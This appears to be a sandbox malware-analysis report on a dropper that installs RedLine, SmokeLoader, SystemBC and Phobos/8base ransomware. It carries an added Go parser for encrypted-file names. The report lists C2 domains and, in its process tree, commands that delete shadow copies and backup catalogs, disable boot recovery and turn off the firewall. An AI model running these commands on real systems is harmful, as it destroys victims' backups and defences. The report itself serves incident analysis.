Analysis
max time kernel: 123s
max time network: 143s
platform: windows10-2004_x64
resource: win10v2004-20230621-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230621-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-06-2023 06:54
Static task: static1
Behavioral task: behavioral1 (sample file.exe, resource win7-20230621-en)
Behavioral task: behavioral2 (sample file.exe, resource win10v2004-20230621-en)
General
Target: file.exe
Size: 288KB
MD5: 6ae917525435e23b07d15537fb40aea0
SHA1: 7c85b447bb5608ba7fb6a332c033c0cdad0430ae
SHA256: 160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a
SHA512: 23e5f94e964d53d72af0d6ad31da309539116a9963806ce7b0d3c028a69ab343df6cd6f3989b280e70a285395425a1cb93492fe5030968558ada5f7de047aaed
SSDEEP: 6144:Ft+WQdzUUPFTf2HHvKlHQho0jT21v3Ifz/x2ShelxPcWpv:61oqm+QbjTIwr/l00m
Malware Config
Extracted: redline
  Botnet: 1
  C2: dexstat255.xyz:46578
  auth_value: c4805fc19583231a4c5bb64b0e833716
Extracted: systembc
  C2: adstat277xm.xyz:4044
  C2: demstat377xm.xyz:4044
Extracted: smokeloader
  Version: 2022
  C2: http://serverlogs37.xyz/statweb255/
  C2: http://servblog757.xyz/statweb255/
  C2: http://dexblog45.xyz/statweb255/
  C2: http://admlogs.online/statweb255/
  C2: http://blogstat355.xyz/statweb255/
  C2: http://blogstatserv25.xyz/statweb255/
Signatures
-
Phobos
Phobos ransomware appeared at the beginning of 2019.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
547C.exe: Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
4320 bcdedit.exe
372 bcdedit.exe
-
Renames multiple (371) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 1 IoCs
Processes:
flow 24, pid 2176 powershell.exe
-
Deletes backup catalog 1 IoCs
Processes:
3488 wbadmin.exe
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
547C.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
547C.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sv.bat.exe: Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation
547C.exe: Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation
SRD.bat.exe: Key value queried \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Control Panel\International\Geo\Nation
-
Drops startup file 1 IoCs
Processes:
3EBF.exe: File created \??\c:\users\admin\appdata\roaming\microsoft\windows\start menu\programs\startup\3EBF.exe
-
Executes dropped EXE 11 IoCs
Processes:
1856 ldx999sx.exe
3420 s777mx.exe
3428 ldx999sx.exe
2992 3C2E.exe
3280 3EBF.exe
4152 42D7.exe
556 3EBF.exe
1424 547C.exe
3852 547C.exe
4112 SRD.bat.exe
2024 sv.bat.exe
-
Loads dropped DLL 1 IoCs
Processes:
1424 547C.exe
-
Obfuscated with Agile.Net obfuscator 4 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
Processes:
yara_rule agile_net: C:\Users\Admin\AppData\Local\Temp\547C.exe
yara_rule agile_net: C:\Users\Admin\AppData\Local\Temp\547C.exe
yara_rule agile_net: behavioral2/memory/1424-396-0x0000000000FF0000-0x000000000164E000-memory.dmp
yara_rule agile_net: C:\Users\Admin\AppData\Local\Temp\547C.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer (YARA rule themida) 3 IoCs
Processes:
yara_rule themida: C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll
yara_rule themida: C:\Users\Admin\AppData\Local\Temp\96f8e3a4-623f-4526-afa7-8c7592f60c75\AgileDotNetRT.dll
yara_rule themida: behavioral2/memory/1424-439-0x00000000707B0000-0x0000000070D90000-memory.dmp
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
3C2E.exe: Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SO FTWARE\Microsoft\Windows\CurrentVersion\Run\Riqyrsb = "C:\\Users\\Admin\\AppData\\Roaming\\Riqyrsb.exe"
3EBF.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe"
3EBF.exe: Set value (str) \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3EBF = "C:\\Users\\Admin\\AppData\\Local\\3EBF.exe"
-
Checks whether UAC is enabled 1 IoCs
Processes:
547C.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
-
Drops desktop.ini file(s) 4 IoCs
Processes:
3EBF.exe: File opened for modification C:\$Recycle.Bin\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini
3EBF.exe: File opened for modification F:\$RECYCLE.BIN\S-1-5-21-922299981-3641064733-3870770889-1000\desktop.ini
3EBF.exe: File opened for modification C:\Program Files\desktop.ini
3EBF.exe: File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI
-
Suspicious use of NtSetInformationThreadHideFromDebugger 26 IoCs
Processes:
2176 powershell.exe (26 occurrences)
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
PID 2176 powershell.exe set thread context of 4716 aspnet_compiler.exe
PID 1856 ldx999sx.exe set thread context of 3428 ldx999sx.exe
PID 1424 cmd.exe set thread context of 3852 547C.exe (the report records the source image as cmd.exe; PID 1424 is listed as 547C.exe under Executes dropped EXE and is the parent of 3852 in the process tree)
-
Drops file in Program Files directory 64 IoCs
Processes:
All 64 entries are by 3EBF.exe. "File created" entries carry the appended ransomware suffix; "File opened for modification" entries are the originals being read.
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_unselected_18.svg
File created C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\FileIcons\FileLogoExtensions.targetsize-256.png
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\SwipeTeachingCalloutArchiveImage.layoutdir-LTR.gif
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\close_x.png
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_3.6.73.0_x64__8wekyb3d8bbwe\Assets\Square310x310Logo.scale-200.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteNewNoteMedTile.scale-125.png
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\ui-strings.js.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\microsoft.system.package.metadata\S-1-5-21-922299981-3641064733-3870770889-1000-MergedResources-0.pri
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\selection-action-plugins\cpdf\plugin.js
File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\models\en-US.Calendar.ot
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\PrintAndShare\Glyph_0xe7d5.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.YourPhone_0.19051.7.0_x64__8wekyb3d8bbwe\Assets\AppTiles\AppIcon.targetsize-30.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-80_altform-unplated_contrast-white.png
File created C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageProviderFunctions.psm1.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll
File opened for modification C:\Program Files\Common Files\System\Ole DB\es-ES\sqloledb.rll.mui
File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100_contrast-high.png
File created C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_x64__8wekyb3d8bbwe\Assets\InsiderHubMedTile.scale-200_contrast-black.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\ColorVertexShader.cso
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\root\ui-strings.js
File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javap.exe
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\toc.xml
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdVL_MAK-pl.xrm-ms
File opened for modification C:\Program Files\Microsoft Office\root\rsod\proof.es-es.msi.16.es-es.boot.tree.dat
File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\WindowsBase.dll
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\Weather_LogoSmall.targetsize-16_altform-unplated.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-32_altform-unplated.png
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-72_altform-unplated.png
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-attach.xml
File created C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\System.Spatial.NetFX35.dll
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STRTEDGE\PREVIEW.GIF.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarBadge.scale-200.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubMedTile.scale-100_contrast-high.png
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-pl.xrm-ms
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\msjet.xsl.id[CF072F13-3483].[[email protected]].8base
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exe.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ccme_ecc.dll
File created C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-16.png
File opened for modification C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-24_altform-lightunplated.png
File created C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\casual.dotx.id[CF072F13-3483].[[email protected]].8base
File created C:\Program Files\Microsoft Office\root\Office16\1033\SETLANG_K_COL.HXK.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\Microsoft Office\root\Office16\ODBC Drivers\Salesforce\lib\OpenSSL64.DllA\zlibwapi.dll
File created C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\personaspybridge.js.id[CF072F13-3483].[[email protected]].8base
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\DataModel\Microsoft.Data.Odata.dll.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\Store.Purchase\Controls\SignInControl.xaml
File created C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Tw Cen MT.xml.id[CF072F13-3483].[[email protected]].8base
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp3-ul-oob.xrm-ms
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\ACEODBCI.DLL
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FetchingMail-Dark.scale-150.png
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsnor.xml
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\191.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteSectionWideTile.scale-400.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorAppList.contrast-white_targetsize-60.png
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1907.3152.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\InsiderHubSmallTile.scale-100.png
-
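The listing above shows the naming the encryptor uses: the original path, then ".id[<8 hex>-<4 hex>]", then the contact in square brackets, then the ".8base" extension (the report renders the contact as "[email protected]"). Pulling those parts out of a file-activity listing is the first step of scoping an incident: the victim id tells you whether files on a share came from one host or several, and the extension and contact identify the affiliate build. The Go program below is an added example, not part of this report or of the sandbox's tooling; it parses the report's own "File created <path> <process>" line form, and the F: share entry, the second victim id 0A1B2C3D and the contact helpdesk@example.invalid in its sample listing are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"regexp"
	"strings"
)

// PhobosName holds the parts of a filename carrying the suffix this sample
// appends to each file it encrypts: <original>.id[<victim-id>-<affix>].[<contact>].<ext>
type PhobosName struct {
	Original string // path as it was before encryption
	VictimID string // 8 hex chars; constant for one infected host (CF072F13 on this page)
	Affix    string // 4 hex chars after the dash (3483 on this page)
	Contact  string // attacker contact exactly as written into the name
	Ext      string // trailing extension (8base on this page)
}

// The contact is matched lazily because it may itself contain square brackets
// (this report renders it as "[email protected]"); anchoring at the end of the
// string makes the last "].<ext>" the one that terminates the suffix.
var phobosRe = regexp.MustCompile(
	`^(.+)\.id\[([0-9A-Fa-f]{8})-([0-9A-Fa-f]{4})\]\.\[(.+?)\]\.([A-Za-z0-9]+)$`)

// ParsePhobosName splits a full path into its suffix components.
func ParsePhobosName(path string) (PhobosName, error) {
	m := phobosRe.FindStringSubmatch(path)
	if m == nil {
		return PhobosName{}, errors.New("no Phobos-style suffix: " + path)
	}
	return PhobosName{
		Original: m[1],
		VictimID: strings.ToUpper(m[2]),
		Affix:    strings.ToUpper(m[3]),
		Contact:  m[4],
		Ext:      m[5],
	}, nil
}

// Summary aggregates a sandbox file-activity listing.
type Summary struct {
	Encrypted int            // "File created" entries that carry the suffix
	Opened    int            // "File opened for modification" entries (the pre-encryption read)
	VictimIDs map[string]int // victim-id -> count; more than one key means files from several hosts
	Exts      map[string]int // extension -> count
	Processes map[string]int // writing process -> encrypted-file count
}

// Lines are in the report's own form "File <action> <path> <process>". The
// path may contain spaces, so the process is the final whitespace-free token.
var listingRe = regexp.MustCompile(`^File (created|opened for modification) (.+) (\S+)$`)

// SummarizeListing counts encrypted files per victim id, extension and
// writing process. A created file without the suffix (a ransom note, say)
// is not counted as encrypted.
func SummarizeListing(lines []string) Summary {
	s := Summary{VictimIDs: map[string]int{}, Exts: map[string]int{}, Processes: map[string]int{}}
	for _, ln := range lines {
		m := listingRe.FindStringSubmatch(strings.TrimSpace(ln))
		if m == nil {
			continue
		}
		if m[1] == "opened for modification" {
			s.Opened++
			continue
		}
		pn, err := ParsePhobosName(m[2])
		if err != nil {
			continue
		}
		s.Encrypted++
		s.VictimIDs[pn.VictimID]++
		s.Exts[pn.Ext]++
		s.Processes[m[3]]++
	}
	return s
}

// Constructed listing in the report's format. The first three lines copy
// entries from this report; the F: share entry (second victim id, contact
// address) and the info.hta line are made up for the example.
var sampleListing = []string{
	`File opened for modification C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_wasapi_plugin.dll 3EBF.exe`,
	`File created C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll.id[CF072F13-3483].[[email protected]].8base 3EBF.exe`,
	`File created C:\Program Files\Microsoft Office\root\vfs\System\msvcr110.dll.id[CF072F13-3483].[[email protected]].8base 3EBF.exe`,
	`File created F:\share\q3.xlsx.id[0A1B2C3D-3483].[helpdesk@example.invalid].8base 3EBF.exe`,
	`File created C:\Users\Admin\Desktop\info.hta 3EBF.exe`,
}

func main() {
	s := SummarizeListing(sampleListing)
	fmt.Printf("encrypted=%d opened=%d victims=%v exts=%v by=%v\n",
		s.Encrypted, s.Opened, s.VictimIDs, s.Exts, s.Processes)
}
```

Run against a real report export, the interesting outputs are a VictimIDs map with more than one key (files encrypted elsewhere and copied in, or a host that was hit twice) and an Exts map with more than one extension (more than one build touching the same volume).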
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
1308 WerFault.exe (target 556 3EBF.exe)
3344 WerFault.exe (target 4152 42D7.exe)
-
Checks SCSI registry key(s) 3 TTPs 7 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000
vds.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName
ldx999sx.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
ldx999sx.exe: Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
ldx999sx.exe: Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI
vds.exe: Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000
vds.exe: Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
2860 vssadmin.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
2176 powershell.exe (64 occurrences)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
3292 (no image name recorded for this PID)
-
Suspicious behavior: MapViewOfSection 31 IoCs
Processes:
3428 ldx999sx.exe
3292 (no image name recorded; 30 occurrences)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
In the order recorded (the list is capped at 64 entries):
2176 powershell.exe: SeDebugPrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege
4716 aspnet_compiler.exe: SeDebugPrivilege
3292 (no image name recorded): SeShutdownPrivilege, SeCreatePagefilePrivilege, SeShutdownPrivilege, SeCreatePagefilePrivilege
3280 3EBF.exe: SeDebugPrivilege
4908 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
2992 3C2E.exe: SeDebugPrivilege
3292: SeShutdownPrivilege, SeCreatePagefilePrivilege
2156 WMIC.exe (the same 21-privilege set is enabled twice): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36 (LUIDs 33-36 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege and SeDelegateSessionUserImpersonatePrivilege; wmic.exe enables every privilege in its token before running a query, so this block is a property of wmic rather than of the sample)
3928 wbengine.exe: SeBackupPrivilege, SeRestorePrivilege, SeSecurityPrivilege
3292: SeShutdownPrivilege, SeCreatePagefilePrivilege
2992 3C2E.exe: SeDebugPrivilege
3292: SeShutdownPrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Grouped as source -> target, with the number of recorded writes (64 in total, in the order recorded):
2228 file.exe -> 2176 powershell.exe (3)
2176 powershell.exe -> 4716 aspnet_compiler.exe (8)
4716 aspnet_compiler.exe -> 1856 ldx999sx.exe (3)
4716 aspnet_compiler.exe -> 3420 s777mx.exe (3)
1856 ldx999sx.exe -> 3428 ldx999sx.exe (6)
3292 -> 2992 3C2E.exe (2)
3292 -> 3280 3EBF.exe (3)
3292 -> 4152 42D7.exe (3)
3292 -> 1424 547C.exe (3)
3292 -> 4248 explorer.exe (4)
3280 3EBF.exe -> 4988 cmd.exe (2)
3280 3EBF.exe -> 4980 cmd.exe (2)
3292 -> 1644 explorer.exe (3)
3292 -> 4256 explorer.exe (4)
3292 -> 4940 explorer.exe (4)
4980 cmd.exe -> 1776 netsh.exe (2)
4988 cmd.exe -> 2860 vssadmin.exe (2)
3292 -> 4500 explorer.exe (4)
3292 -> 544 explorer.exe (3)
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
outlook_office_path 1 IoCs
Processes:
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
outlook_win_path 1 IoCs
Processes:
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
Indentation and the bracketed number give each process's depth in the tree; the line under each image is the command line the sandbox recorded, followed by the signatures that fired on that process.
[1] C:\Users\Admin\AppData\Local\Temp\file.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\file.exe"
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        command line: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        - Blocklisted process makes network request
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            command line: C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            [4] C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
                command line: "C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"
                - Executes dropped EXE
                - Suspicious use of SetThreadContext
                - Suspicious use of WriteProcessMemory
                [5] C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
                    command line: "C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"
                    - Executes dropped EXE
                    - Checks SCSI registry key(s)
                    - Suspicious behavior: MapViewOfSection
            [4] C:\Users\Admin\AppData\Local\Temp\s777mx.exe
                command line: "C:\Users\Admin\AppData\Local\Temp\s777mx.exe"
                - Executes dropped EXE
[1] C:\Users\Admin\AppData\Local\Temp\3C2E.exe
    command line: C:\Users\Admin\AppData\Local\Temp\3C2E.exe
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
[1] C:\Users\Admin\AppData\Local\Temp\3EBF.exe
    command line: C:\Users\Admin\AppData\Local\Temp\3EBF.exe
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Drops desktop.ini file(s)
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    [2] C:\Users\Admin\AppData\Local\Temp\3EBF.exe
        command line: "C:\Users\Admin\AppData\Local\Temp\3EBF.exe"
        - Executes dropped EXE
        [3] C:\Windows\SysWOW64\WerFault.exe
            command line: C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 216
            - Program crash
    [2] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe"
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\netsh.exe
            command line: netsh advfirewall set currentprofile state off
            - Modifies Windows Firewall
        [3] C:\Windows\system32\netsh.exe
            command line: netsh firewall set opmode mode=disable
            - Modifies Windows Firewall
    [2] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\system32\cmd.exe"
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\vssadmin.exe
            command line: vssadmin delete shadows /all /quiet
            - Interacts with shadow copies
        [3] C:\Windows\System32\Wbem\WMIC.exe
            command line: wmic shadowcopy delete
            - Suspicious use of AdjustPrivilegeToken
        [3] C:\Windows\system32\bcdedit.exe
            command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
            - Modifies boot configuration data using bcdedit
        [3] C:\Windows\system32\bcdedit.exe
            command line: bcdedit /set {default} recoveryenabled no
            - Modifies boot configuration data using bcdedit
        [3] C:\Windows\system32\wbadmin.exe
            command line: wbadmin delete catalog -quiet
            - Deletes backup catalog
[1] C:\Users\Admin\AppData\Local\Temp\42D7.exe
    command line: C:\Users\Admin\AppData\Local\Temp\42D7.exe
    - Executes dropped EXE
